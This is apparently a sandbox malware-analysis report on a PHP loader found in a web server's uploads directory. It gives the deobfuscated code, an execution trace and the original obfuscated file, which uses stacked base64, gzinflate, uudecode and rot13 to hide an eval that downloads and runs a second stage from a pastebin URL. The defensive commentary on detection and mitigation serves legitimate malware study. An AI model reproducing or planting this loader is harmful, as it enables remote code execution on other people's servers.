PHP Malware Analysis

indo.php

md5: 86b3c2604b8e5f65446196bdf32c2361


Deobfuscated PHP code

<?php

// Stage-1 loader as recovered by PHPDeobfuscator from the six stacked decoders in
// the original file (base64 -> gzinflate -> uudecode -> rot13 -> gzinflate ->
// base64; each step is visible in the execution trace). Only this small loader is
// on disk — the actual payload is fetched at runtime, which is why static
// signatures on the file alone miss the behaviour.
$auth_pass = "a0b4785be26dc9d534fa633e4c5cc5a3";
///Passs Default kontol900
// NOTE(review): $auth_pass is never read by the code visible here. The author's
// comment above suggests it gates a login in the downloaded stage — unverified,
// since that stage was not retrieved in the sandbox run.
eval /* PHPDeobfuscator eval output */ {
    // Fetches the next stage over unencrypted HTTP from a paste site; this needs
    // allow_url_fopen enabled. In the recorded trace the request returned FALSE,
    // after which base64_decode('') gave '' and gzinflate('') gave FALSE, so no
    // second stage executed — the sample's real behaviour is therefore unknown.
    $m3r1c4 = file_get_contents('http://pastebin.com/raw/V3uuAY5T');
    // Detection: outbound requests from the web-server process to pastebin.com/raw
    // and eval() of gzinflate(base64_decode(...)) output. Mitigation: egress
    // filtering, allow_url_fopen=0, and (per the trace paths) not letting files in
    // an uploads/ directory execute as PHP.
    eval(gzinflate(base64_decode($m3r1c4)));
};
?>
</html>

Execution traces

data/traces/86b3c2604b8e5f65446196bdf32c2361_trace-1676251195.604.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:20:21.501771]
1	0	1	0.000137	393512
1	3	0	0.000191	395032	{main}	1		/var/www/html/uploads/indo.php	0	0
1		A						/var/www/html/uploads/indo.php	2	$auth_pass = 'a0b4785be26dc9d534fa633e4c5cc5a3'
2	4	0	0.000224	395032	base64_decode	0		/var/www/html/uploads/indo.php	3	1	'BcFbEoIgAADAf2+RKFFYli+msUKwjAyyEc1XFvc/RbsKHDV2BMqgA1hwmcfLThIQbtwi53dBx8kY6eK+iobt9XVYpTTOeJ322ZLzH7NUfgS2TZ5AN37e9K3NkvDgesojQs7T55siDGPmJ9X3EbxpxedFXwSxoxpDvbOlEiI9XhO6N2KzRlPcolYzCm8rqLfTnqWl03VY1BrK0h9YNMv8vjuVxYmP6GcZ6w8=\n'
2	4	1	0.000247	395320
2	4	R			'\005�[\022� \000\000�o�(QX�/��B��\f�\021�W\026�?E�\n\0345v\004ʠ\003Xp���N\022\020n�"�wA��\030�⾊��uX�4�x��ْ�\037�T~\004�M�@7~��͒��z�#B���"\fc�\'�\021�i��E_\004��\032C���\022"=^\023�7b�FSܢV3\no+��Ӟ���uX�\032��\037X4��;�ʼn��g\031�\017'
2	5	0	0.000287	395288	gzinflate	0		/var/www/html/uploads/indo.php	3	1	'\005�[\022� \000\000�o�(QX�/��B��\f�\021�W\026�?E�\n\0345v\004ʠ\003Xp���N\022\020n�"�wA��\030�⾊��uX�4�x��ْ�\037�T~\004�M�@7~��͒��z�#B���"\fc�\'�\021�i��E_\004��\032C���\022"=^\023�7b�FSܢV3\no+��Ӟ���uX�\032��\037X4��;�ʼn��g\031�\017'
2	5	1	0.000326	395544
2	5	R			'M#<S+$H(@&$#A2D]ZD0L7#3-%FCBIH?Z[``L%+XO4Y.EP9);?5@BR;X@\'BB_A\nMC<#""7N#ST/CTXU"A639%,M,7HL][\\^;(+&5A/6O^K2V?OB]!XF25$MT`?,>\nM67L,BR7?1`H-*([5U(USA?&G)&S.[1A;J$WW+HRS&LJ/YA4]LCI0=JF=BZ(_\n`\n'
2	6	0	0.000350	395256	convert_uudecode	0		/var/www/html/uploads/indo.php	3	1	'M#<S+$H(@&$#A2D]ZD0L7#3-%FCBIH?Z[``L%+XO4Y.EP9);?5@BR;X@\'BB_A\nMC<#""7N#ST/CTXU"A639%,M,7HL][\\^;(+&5A/6O^K2V?OB]!XF25$MT`?,>\nM67L,BR7?1`H-*([5U(USA?&G)&S.[1A;J$WW+HRS&LJ/YA4]LCI0=JF=BZ(_\n`\n'
2	6	1	0.000372	395480
2	6	R			'\r��\022� \030@�JOz�\v\027\r3E�8����\000\v\005/����pd��V\b�o�\a�/��\t{��C�ӍB�d�\024�L^�=�ϛ ��������~��\a��TKt\001�\036Y{\f�%�D\n\r(��ԍs��$l��\030[�M�.��\032ʏ�\025=�:Pv����?'
2	7	0	0.000420	395224	str_rot13	0		/var/www/html/uploads/indo.php	3	1	'\r��\022� \030@�JOz�\v\027\r3E�8����\000\v\005/����pd��V\b�o�\a�/��\t{��C�ӍB�d�\024�L^�=�ϛ ��������~��\a��TKt\001�\036Y{\f�%�D\n\r(��ԍs��$l��\030[�M�.��\032ʏ�\025=�:Pv����?'
2	7	1	0.000461	395416
2	7	R			'\r��\022� \030@�WBm�\v\027\r3R�8����\000\v\005/����cq��I\b�b�\a�/��\t{��P�ӍO�q�\024�Y^�=�ϛ ��������~��\a��GXg\001�\036L{\f�%�Q\n\r(��ԍf��$y��\030[�Z�.��\032ʏ�\025=�:Ci����?'
2	8	0	0.000505	395192	gzinflate	0		/var/www/html/uploads/indo.php	3	1	'\r��\022� \030@�WBm�\v\027\r3R�8����\000\v\005/����cq��I\b�b�\a�/��\t{��P�ӍO�q�\024�Y^�=�ϛ ��������~��\a��GXg\001�\036L{\f�%�Q\n\r(��ԍf��$y��\030[�Z�.��\032ʏ�\025=�:Ci����?'
2	8	1	0.000549	395416
2	8	R			'JG0zcjFjNCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9WM3V1QVk1VCcpOw0KZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkbTNyMWM0KSkpOw=='
2	9	0	0.000580	395224	base64_decode	0		/var/www/html/uploads/indo.php	3	1	'JG0zcjFjNCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9WM3V1QVk1VCcpOw0KZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkbTNyMWM0KSkpOw=='
2	9	1	0.000605	395448
2	9	R			'$m3r1c4 = file_get_contents(\'http://pastebin.com/raw/V3uuAY5T\');\r\neval(gzinflate(base64_decode($m3r1c4)));'
2	10	0	0.000646	396608	eval	1	'$m3r1c4 = file_get_contents(\'http://pastebin.com/raw/V3uuAY5T\');\r\neval(gzinflate(base64_decode($m3r1c4)));'	/var/www/html/uploads/indo.php	3	0
3	11	0	0.000670	396608	file_get_contents	0		/var/www/html/uploads/indo.php(3) : eval()'d code	1	1	'http://pastebin.com/raw/V3uuAY5T'
3	11	1	0.070238	399784
3	11	R			FALSE
2		A						/var/www/html/uploads/indo.php(3) : eval()'d code	1	$m3r1c4 = FALSE
3	12	0	0.070300	399744	base64_decode	0		/var/www/html/uploads/indo.php(3) : eval()'d code	2	1	FALSE
3	12	1	0.070323	399808
3	12	R			''
3	13	0	0.070341	399776	gzinflate	0		/var/www/html/uploads/indo.php(3) : eval()'d code	2	1	''
3	13	1	0.070372	399808
3	13	R			FALSE
2	10	1	0.070393	399776
1	3	1	0.070404	398312
			0.070448	317416
TRACE END   [2023-02-12 23:20:21.572109]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
// Original on-disk form. The only plaintext artifact is $auth_pass; everything
// else is the base64 blob below, unwrapped by six nested decode calls and handed
// straight to eval(). The execution trace shows the decoded result is a short
// pastebin downloader (see the "Deobfuscated PHP code" section). The specific
// stacking of base64/gzinflate/uudecode/rot13 is a useful static signature, and
// the blob itself can be treated as an indicator for this sample.
$auth_pass = "a0b4785be26dc9d534fa633e4c5cc5a3";///Passs Default kontol900
// Trace paths show this ran as /var/www/html/uploads/indo.php — a file in an
// uploads directory being executed as PHP is itself the finding to act on.
eval(base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(("BcFbEoIgAADAf2+RKFFYli+msUKwjAyyEc1XFvc/RbsKHDV2BMqgA1hwmcfLThIQbtwi53dBx8kY6eK+iobt9XVYpTTOeJ322ZLzH7NUfgS2TZ5AN37e9K3NkvDgesojQs7T55siDGPmJ9X3EbxpxedFXwSxoxpDvbOlEiI9XhO6N2KzRlPcolYzCm8rqLfTnqWl03VY1BrK0h9YNMv8vjuVxYmP6GcZ6w8=
"))))))));
?>
</html>